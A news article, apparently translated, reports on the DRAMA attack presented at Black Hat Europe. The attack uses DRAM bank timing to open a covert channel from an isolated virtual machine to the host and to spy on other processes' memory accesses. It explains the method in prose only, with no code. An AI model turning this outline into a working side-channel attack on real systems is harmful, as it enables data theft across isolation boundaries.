DRAMA: New attack stealthily steals data from isolated virtual machines



    At the Black Hat Europe conference held on November 1-4, London, Austrian researchers presented a new attack using features of the implementation of the interaction of the CPU with DRAM. The method allows attackers using JavaScript to steal sensitive information directly from virtual machines. The attack was called DRAMA.

    How it works


    Researchers Anders Fogh and Michael Schwarz demonstrated several cross-processor attacks during their presentation. The first part of their research was presented at the USENIX Security Symposium in August this year.

    On Black Hat, the authors showed how attackers using JavaScript can intercept small “chunks” of sensitive data, such as passwords or private keys, from virtual machines that are not even connected to the network.

    There are two attack scenarios:

    • In the first case, two processes - in the virtual machine and in the main system - can communicate with each other.
    • In the second, one process can monitor the memory addresses that another uses.

    Consider the first scenario. The purpose of the attack in this case is to transfer data from a virtual machine (VM) that does not have access to the network to the main system (OS), from where the attacker is already downloading it over the network.

    This is possible due to the features of the DRAM memory device - in particular, the fact that the sending process (located in the VM) and the data receiving process (in the OS) use memory addresses located in the same memory bank (DRAM bank). The mechanism works in such a way that if the process has recently worked with memory from a specific bank, then repeated calls will take place quickly.

    If the sender worked with memory between two calls of the recipient, then the second call will take longer - this will be interpreted as bit 1. In the event that the sender did not work with memory in the interval between two calls, this fact will be designated as 0. The

    main task here - Obtain addresses in a common memory bank (or several banks to speed up the process) and correctly determine the time points for the interaction of the two processes. To solve it, the authors used the features of many modern systems - for example, they often use large pages of memory (> 2 MB) and a certain frequency of polling the address (on the recipient side), which exceeds the recording frequency (on the sender side) by several times. Knowing this, the researchers were able to build assumptions about the behavior of the target system.

    In the second scenario, the attack uses a method similar to attacks using features of the processor cache . The essence of the method is that, knowing which addresses the process used, you can observe the data entered into it - for example, the address of the site that the user entered in the address bar of the browser.

    There are no easy ways to protect.


    Researchers managed to develop an attack that does not require exploiting any vulnerabilities or launching malicious software on the host system. They simply open a hidden channel between the virtual machine and the main system.

    At the same time, Fog and Schwartz admit that the attack may not always be carried out correctly - in some cases, the memory used for filtering data may be occupied by other applications, which will not allow transferring information from the virtual machine, but the probability of such an outcome is not very high.

    The researchers focused on testing their attack method on the Intel x86-64 platform, but they managed to find out that other architectures - for example, ARM processors in smartphones - are also vulnerable

    Since the developed attack uses the features of the DRAM mechanism, there are no simple ways to counter it, the researchers are sure. However, they do not predict a large number of such attacks in real systems in the coming years. But the very likelihood of such attacks shows that developers need to increase the security of not only software, but also the hardware itself.

    Also popular now: